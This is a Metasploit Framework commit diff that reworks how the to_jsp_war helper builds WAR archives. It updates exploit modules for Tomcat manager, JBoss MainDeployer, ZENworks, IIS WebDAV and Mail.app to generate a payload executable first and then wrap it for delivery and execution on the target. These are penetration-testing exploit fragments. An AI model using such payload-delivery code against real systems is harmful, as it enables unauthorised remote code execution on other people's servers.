rework to_jsp_war a bit, fix uses, default msfencode -t war to x86/win32

git-svn-id: file:///home/svn/framework3/trunk@10397 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-20 15:59:46 +00:00 · 2010-09-20 15:59:46 +00:00 · bd1eeb3722
parent 2cd8b7d5e2
commit bd1eeb3722
10 changed files with 25 additions and 34 deletions
--- a/lib/msf/base/simple/payload.rb
+++ b/lib/msf/base/simple/payload.rb
@ -97,7 +97,8 @@ module Payload
 			plat = Msf::Module::PlatformList.transform(opts['Platform'])

 			tmp_plat = plat.platforms
-			buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe})
+			exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
+			buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
 		else
 			# Serialize the generated payload to some sort of format
 			buf = Buffer.transform(e.encoded, fmt)
--- a/lib/msf/core/rpc/module.rb
+++ b/lib/msf/core/rpc/module.rb
@ -216,7 +216,8 @@ class Module < Base
 				output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
 			when 'war'
 				tmp_plat = plat.platforms
-				output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+				exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
+				output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
 			else
 				fmt ||= "ruby"
 				output = Msf::Simple::Buffer.transform(raw, fmt)
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@ -813,9 +813,7 @@ require 'metasm'
 	# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
 	# The jsp page converts the hexdump back to a normal .exe file and places it in
 	# the temp directory. The payload .exe file is then executed.
-	def self.to_jsp_war(framework, arch, plat, code='', opts={})
-
-		exe = to_executable(framework, arch, plat, code, opts)
+	def self.to_jsp_war(exe, opts={})

 		# begin <payload>.jsp
 		var_hexpath       = Rex::Text.rand_text_alpha(rand(8)+8)
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@ -172,9 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					:jsp_name => jsp_name
 				})
 		else
-			@war_data = Msf::Util::EXE.to_jsp_war(framework,
-				arch, plat,
-				p.encoded,
+			exe = generate_payload_exe({ :code => p.encoded })
+			@war_data = Msf::Util::EXE.to_jsp_war(exe,
 				{
 					:app_name => app_base,
 					:jsp_name => jsp_name
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE

 	def initialize(info = {})
 		super(update_info(info,
@ -182,16 +183,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Using manually select target \"#{mytarget.name}\"")
 		end

-		# set arch/platform from the target
-		arch = mytarget['Arch']
-		plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
-
 		# Generate the WAR containing the EXE containing the payload
 		jsp_name = rand_text_alphanumeric(4+rand(32-4))
-		war = Msf::Util::EXE.to_jsp_war(framework,
-			arch, plat,
-			payload.encoded,
-			:jsp_name => jsp_name)
+		exe = generate_payload_exe
+		war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)

 		app_base = rand_text_alphanumeric(4+rand(32-4))
 		query_str = "?path=/" + app_base
--- a/modules/exploits/osx/email/mailapp_image_exec.rb
+++ b/modules/exploits/osx/email/mailapp_image_exec.rb
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# This module sends email messages via smtp
 	#
 	include Msf::Exploit::Remote::SMTPDeliver
+	include Msf::Exploit::EXE

 	def initialize(info = {})
 		super(update_info(info,
@ -142,16 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if (target.arch.include?(ARCH_CMD))
 			cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
 		else
-			bin = ''
-
-			if(target.arch.index(ARCH_PPC))
-				bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
-			end
-
-			if(target.arch.index(ARCH_X86))
-				bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
-			end
-
+			bin = generate_payload_exe
 			cmd = Rex::Text.encode_base64(bin, "\r\n")
 		end

--- a/modules/exploits/windows/http/zenworks_uploadservlet.rb
+++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE

 	def initialize(info = {})
 		super(update_info(info,
@ -55,13 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit

-		arch = target['Arch']
-		plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
-
 		# Generate the WAR containing the EXE containing the payload
 		app_base = rand_text_alphanumeric(4+rand(32-4))
 		jsp_name = rand_text_alphanumeric(8+rand(8))
-		war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
+		
+		exe = generate_payload_exe
+		war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)

 		res = send_request_cgi(
 			{
--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit

 		# Generate the ASP containing the EXE containing the payload
-		asp  = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded)
+		exe  = generate_payload_exe
+		asp  = Msf::Util::EXE.to_exe_asp(exe)
 		path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
 		path_tmp  = path.gsub(/\....$/, ".txt")

--- a/7
+++ b/7
@ -273,8 +273,11 @@ case cmd
 					asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
 					write_encoded(asp)
 				when 'war'
-					tmp_plat = plat.platforms
-					war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+					arch ||= [ ARCH_X86 ]
+					tmp_plat = plat.platforms if plat
+					tmp_plat ||= Msf::Module::PlatformList.transform('win')
+					exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
+					war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
 					write_encoded(war)
 				else
 					fmt ||= "ruby"
--- a/3
+++ b/3
@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
 		arch = payload.arch
 		plat = payload.platform.platforms

-		exe  = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf)
+		exe  = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
+		exe  = Msf::Util::EXE.to_jsp_war(exe)


 		if(exe)